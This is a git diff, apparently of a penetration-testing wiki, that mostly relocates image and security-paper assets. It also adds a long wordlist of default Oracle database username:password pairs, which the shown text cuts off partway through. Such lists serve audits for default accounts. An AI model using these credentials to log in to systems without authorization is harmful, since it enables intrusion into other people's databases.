diff --git a/src/images/1.jpg b/.gitbook/assets/1 (1).jpg similarity index 100% rename from src/images/1.jpg rename to .gitbook/assets/1 (1).jpg diff --git a/src/images/1.png b/.gitbook/assets/1 (1).png similarity index 100% rename from src/images/1.png rename to .gitbook/assets/1 (1).png diff --git a/.gitbook/assets/1 (2) (1) (1).png b/.gitbook/assets/1 (2) (1) (1).png new file mode 100644 index 00000000000..94cf468782b Binary files /dev/null and b/.gitbook/assets/1 (2) (1) (1).png differ diff --git a/.gitbook/assets/1 (2) (1).png b/.gitbook/assets/1 (2) (1).png new file mode 100644 index 00000000000..94cf468782b Binary files /dev/null and b/.gitbook/assets/1 (2) (1).png differ diff --git a/src/images/1 u1jdRYuWAEVwJmf_F2ttJg (1).png b/.gitbook/assets/1-u1jdryuwaevwjmf_f2ttjg.png similarity index 100% rename from src/images/1 u1jdRYuWAEVwJmf_F2ttJg (1).png rename to .gitbook/assets/1-u1jdryuwaevwjmf_f2ttjg.png diff --git a/.gitbook/assets/1.jpg b/.gitbook/assets/1.jpg new file mode 100644 index 00000000000..c5d0a4c9583 Binary files /dev/null and b/.gitbook/assets/1.jpg differ diff --git a/src/images/10.png b/.gitbook/assets/10.png similarity index 100% rename from src/images/10.png rename to .gitbook/assets/10.png diff --git a/src/images/11.png b/.gitbook/assets/11.png similarity index 100% rename from src/images/11.png rename to .gitbook/assets/11.png diff --git a/src/images/12.png b/.gitbook/assets/12.png similarity index 100% rename from src/images/12.png rename to .gitbook/assets/12.png diff --git a/.gitbook/assets/13.png b/.gitbook/assets/13.png new file mode 100644 index 00000000000..c49d3d1acdb Binary files /dev/null and b/.gitbook/assets/13.png differ diff --git a/src/images/14.png b/.gitbook/assets/14.png similarity index 100% rename from src/images/14.png rename to .gitbook/assets/14.png diff --git a/.gitbook/assets/15.png b/.gitbook/assets/15.png new file mode 100644 index 00000000000..bc0d2d9abd3 Binary files /dev/null and b/.gitbook/assets/15.png differ diff --git a/src/images/16.png b/.gitbook/assets/16.png similarity index 100% rename from src/images/16.png rename to .gitbook/assets/16.png diff --git a/src/images/17.png b/.gitbook/assets/17.png similarity index 100% rename from src/images/17.png rename to .gitbook/assets/17.png diff --git a/.gitbook/assets/18.png b/.gitbook/assets/18.png new file mode 100644 index 00000000000..7565cb1d52a Binary files /dev/null and b/.gitbook/assets/18.png differ diff --git a/.gitbook/assets/19.png b/.gitbook/assets/19.png new file mode 100644 index 00000000000..90ca1321da0 Binary files /dev/null and b/.gitbook/assets/19.png differ diff --git a/.gitbook/assets/1_6qc-agcjyzwmf8rgnvr_eg.png b/.gitbook/assets/1_6qc-agcjyzwmf8rgnvr_eg.png new file mode 100644 index 00000000000..5959de32f2a Binary files /dev/null and b/.gitbook/assets/1_6qc-agcjyzwmf8rgnvr_eg.png differ diff --git a/.gitbook/assets/1_jauyizf8zjdggb7ocszc-g.png b/.gitbook/assets/1_jauyizf8zjdggb7ocszc-g.png new file mode 100644 index 00000000000..aea4b23cdd9 Binary files /dev/null and b/.gitbook/assets/1_jauyizf8zjdggb7ocszc-g.png differ diff --git a/src/images/2.jpg b/.gitbook/assets/2.jpg similarity index 100% rename from src/images/2.jpg rename to .gitbook/assets/2.jpg diff --git a/src/images/2.png b/.gitbook/assets/2.png similarity index 100% rename from src/images/2.png rename to .gitbook/assets/2.png diff --git a/.gitbook/assets/20.png b/.gitbook/assets/20.png new file mode 100644 index 00000000000..d5493e6ff32 Binary files /dev/null and b/.gitbook/assets/20.png differ diff --git a/src/images/21.png b/.gitbook/assets/21.png similarity index 100% rename from src/images/21.png rename to .gitbook/assets/21.png diff --git a/src/images/22.png b/.gitbook/assets/22.png similarity index 100% rename from src/images/22.png rename to .gitbook/assets/22.png diff --git a/.gitbook/assets/23.png b/.gitbook/assets/23.png new file mode 100644 index 00000000000..e03728e7db3 Binary files /dev/null and b/.gitbook/assets/23.png differ diff --git a/.gitbook/assets/24.png b/.gitbook/assets/24.png new file mode 100644 index 00000000000..6ba0f4b4e44 Binary files /dev/null and b/.gitbook/assets/24.png differ diff --git a/.gitbook/assets/25.png b/.gitbook/assets/25.png new file mode 100644 index 00000000000..6177926508f Binary files /dev/null and b/.gitbook/assets/25.png differ diff --git a/.gitbook/assets/26.png b/.gitbook/assets/26.png new file mode 100644 index 00000000000..287b50512e2 Binary files /dev/null and b/.gitbook/assets/26.png differ diff --git a/src/images/3-1.png b/.gitbook/assets/3-1.png similarity index 100% rename from src/images/3-1.png rename to .gitbook/assets/3-1.png diff --git a/.gitbook/assets/3.jpg b/.gitbook/assets/3.jpg new file mode 100644 index 00000000000..de5e2cd1599 Binary files /dev/null and b/.gitbook/assets/3.jpg differ diff --git a/src/images/3.png b/.gitbook/assets/3.png similarity index 100% rename from src/images/3.png rename to .gitbook/assets/3.png diff --git a/src/images/4.png b/.gitbook/assets/4 (1).png similarity index 100% rename from src/images/4.png rename to .gitbook/assets/4 (1).png diff --git a/.gitbook/assets/4.jpg b/.gitbook/assets/4.jpg new file mode 100644 index 00000000000..26a0f626362 Binary files /dev/null and b/.gitbook/assets/4.jpg differ diff --git a/.gitbook/assets/4.png b/.gitbook/assets/4.png new file mode 100644 index 00000000000..472fbed86a7 Binary files /dev/null and b/.gitbook/assets/4.png differ diff --git a/.gitbook/assets/41d0cdc8d99a8a3de2758ccbdf637a21.jpeg b/.gitbook/assets/41d0cdc8d99a8a3de2758ccbdf637a21.jpeg new file mode 100644 index 00000000000..7d84b3bae24 Binary files /dev/null and b/.gitbook/assets/41d0cdc8d99a8a3de2758ccbdf637a21.jpeg differ diff --git a/.gitbook/assets/45662029-1b5e6300-bace-11e8-8180-32f8d377d48b.png b/.gitbook/assets/45662029-1b5e6300-bace-11e8-8180-32f8d377d48b.png new file mode 100644 index 00000000000..7c73ffdcb56 Binary files /dev/null and b/.gitbook/assets/45662029-1b5e6300-bace-11e8-8180-32f8d377d48b.png differ diff --git a/.gitbook/assets/5.jpg b/.gitbook/assets/5.jpg new file mode 100644 index 00000000000..66d7e1ca37e Binary files /dev/null and b/.gitbook/assets/5.jpg differ diff --git a/src/images/5.png b/.gitbook/assets/5.png similarity index 100% rename from src/images/5.png rename to .gitbook/assets/5.png diff --git a/.gitbook/assets/6.gif b/.gitbook/assets/6.gif new file mode 100644 index 00000000000..1fc7f7d0f36 Binary files /dev/null and b/.gitbook/assets/6.gif differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1).png new file mode 100644 index 00000000000..4c4968b48f0 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (10).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (10).png new file mode 100644 index 00000000000..4c4968b48f0 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (10).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (11).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (11).png new file mode 100644 index 00000000000..4c4968b48f0 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (11).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (12).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (12).png new file mode 100644 index 00000000000..4c4968b48f0 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (12).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (2).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (2).png new file mode 100644 index 00000000000..4c4968b48f0 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (2).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (3).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (3).png new file mode 100644 index 00000000000..4c4968b48f0 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (3).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (4).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (4).png new file mode 100644 index 00000000000..4c4968b48f0 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (4).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (5).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (5).png new file mode 100644 index 00000000000..4c4968b48f0 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (5).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (6).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (6).png new file mode 100644 index 00000000000..4c4968b48f0 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (6).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (7).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (7).png new file mode 100644 index 00000000000..4c4968b48f0 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (7).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (8).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (8).png new file mode 100644 index 00000000000..4c4968b48f0 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (8).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (9).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (9).png new file mode 100644 index 00000000000..4c4968b48f0 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (9).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4).png new file mode 100644 index 00000000000..4c4968b48f0 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4).png differ diff --git a/src/images/7.png b/.gitbook/assets/7.png similarity index 100% rename from src/images/7.png rename to .gitbook/assets/7.png diff --git a/src/images/8.png b/.gitbook/assets/8.png similarity index 100% rename from src/images/8.png rename to .gitbook/assets/8.png diff --git a/src/images/9.png b/.gitbook/assets/9.png similarity index 100% rename from src/images/9.png rename to .gitbook/assets/9.png diff --git a/.gitbook/assets/a10.png b/.gitbook/assets/a10.png new file mode 100644 index 00000000000..2b7b4dd9c8d Binary files /dev/null and b/.gitbook/assets/a10.png differ diff --git a/.gitbook/assets/a11.png b/.gitbook/assets/a11.png new file mode 100644 index 00000000000..85b1a8e0a63 Binary files /dev/null and b/.gitbook/assets/a11.png differ diff --git a/.gitbook/assets/a12.png b/.gitbook/assets/a12.png new file mode 100644 index 00000000000..0249d9f68b2 Binary files /dev/null and b/.gitbook/assets/a12.png differ diff --git a/.gitbook/assets/a13.png b/.gitbook/assets/a13.png new file mode 100644 index 00000000000..d5d699d9ac3 Binary files /dev/null and b/.gitbook/assets/a13.png differ diff --git a/.gitbook/assets/a14.png b/.gitbook/assets/a14.png new file mode 100644 index 00000000000..8daa0e1262e Binary files /dev/null and b/.gitbook/assets/a14.png differ diff --git a/.gitbook/assets/a15.png b/.gitbook/assets/a15.png new file mode 100644 index 00000000000..ed808f5531f Binary files /dev/null and b/.gitbook/assets/a15.png differ diff --git a/.gitbook/assets/a16.png b/.gitbook/assets/a16.png new file mode 100644 index 00000000000..b3c7203c85d Binary files /dev/null and b/.gitbook/assets/a16.png differ diff --git a/.gitbook/assets/a17.png b/.gitbook/assets/a17.png new file mode 100644 index 00000000000..6a9ecae0fa5 Binary files /dev/null and b/.gitbook/assets/a17.png differ diff --git a/.gitbook/assets/a19.png b/.gitbook/assets/a19.png new file mode 100644 index 00000000000..c89c7ffbf62 Binary files /dev/null and b/.gitbook/assets/a19.png differ diff --git a/.gitbook/assets/a2.png b/.gitbook/assets/a2.png new file mode 100644 index 00000000000..c8d339e2021 Binary files /dev/null and b/.gitbook/assets/a2.png differ diff --git a/.gitbook/assets/a20.png b/.gitbook/assets/a20.png new file mode 100644 index 00000000000..a8cb42c7a9d Binary files /dev/null and b/.gitbook/assets/a20.png differ diff --git a/.gitbook/assets/a21.png b/.gitbook/assets/a21.png new file mode 100644 index 00000000000..34d60bb1e97 Binary files /dev/null and b/.gitbook/assets/a21.png differ diff --git a/.gitbook/assets/a22.png b/.gitbook/assets/a22.png new file mode 100644 index 00000000000..47681388e7b Binary files /dev/null and b/.gitbook/assets/a22.png differ diff --git a/.gitbook/assets/a3.png b/.gitbook/assets/a3.png new file mode 100644 index 00000000000..8a1ffcfe5ed Binary files /dev/null and b/.gitbook/assets/a3.png differ diff --git a/.gitbook/assets/a4.png b/.gitbook/assets/a4.png new file mode 100644 index 00000000000..bde4ec6cfa2 Binary files /dev/null and b/.gitbook/assets/a4.png differ diff --git a/.gitbook/assets/a5.png b/.gitbook/assets/a5.png new file mode 100644 index 00000000000..69e26fe3fb2 Binary files /dev/null and b/.gitbook/assets/a5.png differ diff --git a/.gitbook/assets/a6.png b/.gitbook/assets/a6.png new file mode 100644 index 00000000000..a2837c36f58 Binary files /dev/null and b/.gitbook/assets/a6.png differ diff --git a/.gitbook/assets/a7.png b/.gitbook/assets/a7.png new file mode 100644 index 00000000000..a97e3e5545c Binary files /dev/null and b/.gitbook/assets/a7.png differ diff --git a/.gitbook/assets/a8.png b/.gitbook/assets/a8.png new file mode 100644 index 00000000000..301dfaeef8d Binary files /dev/null and b/.gitbook/assets/a8.png differ diff --git a/.gitbook/assets/a9.png b/.gitbook/assets/a9.png new file mode 100644 index 00000000000..0128043895d Binary files /dev/null and b/.gitbook/assets/a9.png differ diff --git a/src/images/aceinheritance.jpg b/.gitbook/assets/aceinheritance.jpg similarity index 100% rename from src/images/aceinheritance.jpg rename to .gitbook/assets/aceinheritance.jpg diff --git a/src/files/app-release.zip b/.gitbook/assets/app-release.zip similarity index 100% rename from src/files/app-release.zip rename to .gitbook/assets/app-release.zip diff --git a/src/images/asd1.png b/.gitbook/assets/asd1.png similarity index 100% rename from src/images/asd1.png rename to .gitbook/assets/asd1.png diff --git a/src/images/audit-tab.jpg b/.gitbook/assets/audit-tab.jpg similarity index 100% rename from src/images/audit-tab.jpg rename to .gitbook/assets/audit-tab.jpg diff --git a/.gitbook/assets/b1.png b/.gitbook/assets/b1.png new file mode 100644 index 00000000000..ffd6fde7846 Binary files /dev/null and b/.gitbook/assets/b1.png differ diff --git a/.gitbook/assets/b2.png b/.gitbook/assets/b2.png new file mode 100644 index 00000000000..e6a65f817d8 Binary files /dev/null and b/.gitbook/assets/b2.png differ diff --git a/.gitbook/assets/b3.png b/.gitbook/assets/b3.png new file mode 100644 index 00000000000..b03da63d901 Binary files /dev/null and b/.gitbook/assets/b3.png differ diff --git a/.gitbook/assets/b4.png b/.gitbook/assets/b4.png new file mode 100644 index 00000000000..dd685597d17 Binary files /dev/null and b/.gitbook/assets/b4.png differ diff --git a/src/images/classicsectab.jpg b/.gitbook/assets/classicsectab.jpg similarity index 100% rename from src/images/classicsectab.jpg rename to .gitbook/assets/classicsectab.jpg diff --git a/.gitbook/assets/copy_binary_admin.png b/.gitbook/assets/copy_binary_admin.png new file mode 100644 index 00000000000..055b246a900 Binary files /dev/null and b/.gitbook/assets/copy_binary_admin.png differ diff --git a/src/files/CTX_WSUSpect_White_Paper (1).pdf b/.gitbook/assets/ctx_wsuspect_white_paper (1).pdf similarity index 100% rename from src/files/CTX_WSUSpect_White_Paper (1).pdf rename to .gitbook/assets/ctx_wsuspect_white_paper (1).pdf diff --git a/.gitbook/assets/ctx_wsuspect_white_paper.pdf b/.gitbook/assets/ctx_wsuspect_white_paper.pdf new file mode 100644 index 00000000000..d152ec3a50d Binary files /dev/null and b/.gitbook/assets/ctx_wsuspect_white_paper.pdf differ diff --git a/src/images/EauBb2EX0AERaNK (1).jpg b/.gitbook/assets/eaubb2ex0aerank.jpg similarity index 100% rename from src/images/EauBb2EX0AERaNK (1).jpg rename to .gitbook/assets/eaubb2ex0aerank.jpg diff --git a/src/images/editseprincipalpointers1.jpg b/.gitbook/assets/editseprincipalpointers1.jpg similarity index 100% rename from src/images/editseprincipalpointers1.jpg rename to .gitbook/assets/editseprincipalpointers1.jpg diff --git a/.gitbook/assets/eki5edauuaaipik.jpg b/.gitbook/assets/eki5edauuaaipik.jpg new file mode 100644 index 00000000000..24c786eb7fc Binary files /dev/null and b/.gitbook/assets/eki5edauuaaipik.jpg differ diff --git a/src/files/EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf b/.gitbook/assets/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf similarity index 100% rename from src/files/EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf rename to .gitbook/assets/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf diff --git a/src/files/EN-Local-File-Inclusion-1.pdf b/.gitbook/assets/en-local-file-inclusion-1.pdf similarity index 100% rename from src/files/EN-Local-File-Inclusion-1.pdf rename to .gitbook/assets/en-local-file-inclusion-1.pdf diff --git a/.gitbook/assets/en-nosql-no-injection-ron-shulman-peleg-bronshtein-1.pdf b/.gitbook/assets/en-nosql-no-injection-ron-shulman-peleg-bronshtein-1.pdf new file mode 100644 index 00000000000..3b49b5d5a9e Binary files /dev/null and b/.gitbook/assets/en-nosql-no-injection-ron-shulman-peleg-bronshtein-1.pdf differ diff --git a/src/files/EN-PHP-loose-comparison-Type-Juggling-OWASP (1).pdf b/.gitbook/assets/en-php-loose-comparison-type-juggling-owasp (1).pdf similarity index 100% rename from src/files/EN-PHP-loose-comparison-Type-Juggling-OWASP (1).pdf rename to .gitbook/assets/en-php-loose-comparison-type-juggling-owasp (1).pdf diff --git a/.gitbook/assets/en-php-loose-comparison-type-juggling-owasp.pdf b/.gitbook/assets/en-php-loose-comparison-type-juggling-owasp.pdf new file mode 100644 index 00000000000..f69e6346405 Binary files /dev/null and b/.gitbook/assets/en-php-loose-comparison-type-juggling-owasp.pdf differ diff --git a/.gitbook/assets/en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf b/.gitbook/assets/en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf new file mode 100644 index 00000000000..9eacd65568a Binary files /dev/null and b/.gitbook/assets/en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf differ diff --git a/src/files/epmd_bf-0.1.tar.bz2 b/.gitbook/assets/epmd_bf-0.1.tar.bz2 similarity index 100% rename from src/files/epmd_bf-0.1.tar.bz2 rename to .gitbook/assets/epmd_bf-0.1.tar.bz2 diff --git a/.gitbook/assets/final-oracle-accs.txt b/.gitbook/assets/final-oracle-accs.txt new file mode 100644 index 00000000000..7e1932c4484 --- /dev/null +++ b/.gitbook/assets/final-oracle-accs.txt @@ -0,0 +1,1578 @@ +AASH:AASH +ABA1:ABA1 +abm:abm +ABM:ABM +adams:wood +ADAMS:WOOD +adldemo:adldemo +ADLDEMO:ADLDEMO +administrator:admin +ADMINISTRATOR:ADMIN +administrator:administrator +ADMINISTRATOR:ADMINISTRATOR +admin:jetspeed +ADMIN:JETSPEED +admin:welcome +ADMIN:WELCOME +AD_MONITOR:LIZARD +ADS:ADS +ADSEUL_US:WELCOME +ahl:ahl +AHL:AHL +ahm:ahm +AHM:AHM +ak:ak +AK:AK +ALA1:ALA1 +AL:AL +alhro:xxx +ALHRO:XXX +alhrw:xxx +ALHRW:XXX +ALLUSERS:ALLUSERS +alr:alr +ALR:ALR +AMA1:AMA1 +AMA2:AMA2 +AMA3:AMA3 +AMA4:AMA4 +AMF:AMF +AMS1:AMS1 +AMS2:AMS2 +AMS3:AMS3 +AMS4:AMS4 +ams:ams +AMS:AMS +AMSYS:AMSYS +amv:amv +AMV:AMV +AMW:AMW +andy:swordfish +ANDY:SWORDFISH +ANNE:ANNE +anonymous:anonymous +ANONYMOUS:ANONYMOUS +AOLDEMO:AOLDEMO +APA1:APA1 +APA2:APA2 +APA3:APA3 +APA4:APA4 +ap:ap +AP:AP +APPLEAD:APPLEAD +applmgr:applmgr +APPLMGR:APPLMGR +applsys:applsys +APPLSYS:APPLSYS +applsys:apps +APPLSYS:APPS +applsys:fnd +APPLSYS:FND +applsyspub:applsyspub +APPLSYSPUB:APPLSYSPUB +applsyspub:fndpub +APPLSYSPUB:FNDPUB +applsyspub:pub +APPLSYSPUB:PUB +applysyspub:fndpub +APPLYSYSPUB:FNDPUB +applysyspub:pub +APPLYSYSPUB:PUB +apps:apps +APPS:APPS +apps_mrc:apps +APPS_MRC:APPS +appuser:apppassword +APPUSER:APPPASSWORD +APS1:APS1 +APS2:APS2 +APS3:APS3 +APS4:APS4 +aq:aq +AQ:AQ +aqdemo:aqdemo +AQDEMO:AQDEMO +aqjava:aqjava +AQJAVA:AQJAVA +aquser:aquser +AQUSER:AQUSER +ARA1:ARA1 +ARA2:ARA2 +ARA3:ARA3 +ARA4:ARA4 +ar:ar +AR:AR +ARS1:ARS1 +ARS2:ARS2 +ARS3:ARS3 +ARS4:ARS4 +ART:ART +asf:asf +ASF:ASF +asg:asg +ASG:ASG +asl:asl +ASL:ASL +ASN:ASN +aso:aso +ASO:ASO +asp:asp +ASP:ASP +ast:ast +AST:AST +atm:sampleatm +ATM:SAMPLEATM +AUC_GUEST:AUC_GUEST +audiouser:audiouser +AUDIOUSER:AUDIOUSER +aurora$jis$utility$:invalid +AURORA$JIS$UTILITY$:INVALID +aurora$orb$unauthenticated:invalid +AURORA$ORB$UNAUTHENTICATED:INVALID +AUTHORIA:AUTHORIA +ax:ax +AX:AX +az:az +AZ:AZ +B2B:B2B +BAM:BAM +bc4j:bc4j +BC4J:BC4J +BCA1:BCA1 +BCA2:BCA2 +ben:ben +BEN:BEN +bic:bic +BIC:BIC +bil:bil +BIL:BIL +bim:bim +BIM:BIM +bis:bis +BIS:BIS +biv:biv +BIV:BIV +bix:bix +BIX:BIX +blake:paper +BLAKE:PAPER +blewis:blewis +BLEWIS:BLEWIS +BMEADOWS:BMEADOWS +BNE:BNE +bom:bom +BOM:BOM +BP01:BP01 +BP02:BP02 +BP03:BP03 +BP04:BP04 +BP05:BP05 +BP06:BP06 +brio_admin:brio_admin +BRIO_ADMIN:BRIO_ADMIN +brugernavn:adgangskode +BRUGERNAVN:ADGANGSKODE +brukernavn:password +BRUKERNAVN:PASSWORD +bsc:bsc +BSC:BSC +bug_reports:bug_reports +BUG_REPORTS:BUG_REPORTS +BUYACCT:BUYACCT +BUYAPPR1:BUYAPPR1 +BUYAPPR2:BUYAPPR2 +BUYAPPR3:BUYAPPR3 +BUYER:BUYER +BUYMTCH:BUYMTCH +calvin:hobbes +CALVIN:HOBBES +CAMRON:CAMRON +CANDICE:CANDICE +CARL:CARL +CARLY:CARLY +CARMEN:CARMEN +CARRIECONYERS:CARRIECONYERS +CATADMIN:CATADMIN +catalog:catalog +CATALOG:CATALOG +cct:cct +CCT:CCT +cdemo82:cdemo82 +CDEMO82:CDEMO82 +cdemo82:cdemo83 +CDEMO82:CDEMO83 +cdemo82:unknown +CDEMO82:UNKNOWN +cdemocor:cdemocor +CDEMOCOR:CDEMOCOR +cdemorid:cdemorid +CDEMORID:CDEMORID +cdemoucb:cdemoucb +CDEMOUCB:CDEMOUCB +cdouglas:cdouglas +CDOUGLAS:CDOUGLAS +CEASAR:CEASAR +ce:ce +CE:CE +centra:centra +CENTRA:CENTRA +central:central +CENTRAL:CENTRAL +CFD:CFD +CHANDRA:CHANDRA +CHARLEY:CHARLEY +CHRISBAKER:CHRISBAKER +CHRISTIE:CHRISTIE +cids:cids +CIDS:CIDS +CINDY:CINDY +cis:cis +CIS:CIS +cisinfo:cisinfo +CISINFO:CISINFO +cisinfo:zwerg +CISINFO:ZWERG +cis:zwerg +CIS:ZWERG +CLARK:CLARK +clark:cloth +CLARK:CLOTH +CLAUDE:CLAUDE +CLINT:CLINT +CLN:CLN +CNCADMIN:CNCADMIN +cn:cn +CN:CN +company:company +COMPANY:COMPANY +compiere:compiere +COMPIERE:COMPIERE +CONNIE:CONNIE +CONNOR:CONNOR +CORY:CORY +cqschemauser:password +CQSCHEMAUSER:PASSWORD +cquserdbuser:password +CQUSERDBUSER:PASSWORD +CRM1:CRM1 +CRM2:CRM2 +CRPB733:CRPB733 +crp:crp +CRP:CRP +CRPCTL:CRPCTL +CRPDTA:CRPDTA +CSADMIN:CSADMIN +CSAPPR1:CSAPPR1 +csc:csc +CSC:CSC +cs:cs +CS:CS +csd:csd +CSD:CSD +CSDUMMY:CSDUMMY +cse:cse +CSE:CSE +csf:csf +CSF:CSF +csi:csi +CSI:CSI +csl:csl +CSL:CSL +CSM:CSM +csmig:csmig +CSMIG:CSMIG +csp:csp +CSP:CSP +csr:csr +CSR:CSR +css:css +CSS:CSS +ctxdemo:ctxdemo +CTXDEMO:CTXDEMO +ctxsys:change_on_install +CTXSYS:CHANGE_ON_INSTALL +ctxsys:ctxsys +CTXSYS:CTXSYS +ctxsys:unknown +CTXSYS:UNKNOWN +CTXTEST:CTXTEST +cua:cua +CUA:CUA +cue:cue +CUE:CUE +cuf:cuf +CUF:CUF +cug:cug +CUG:CUG +cui:cui 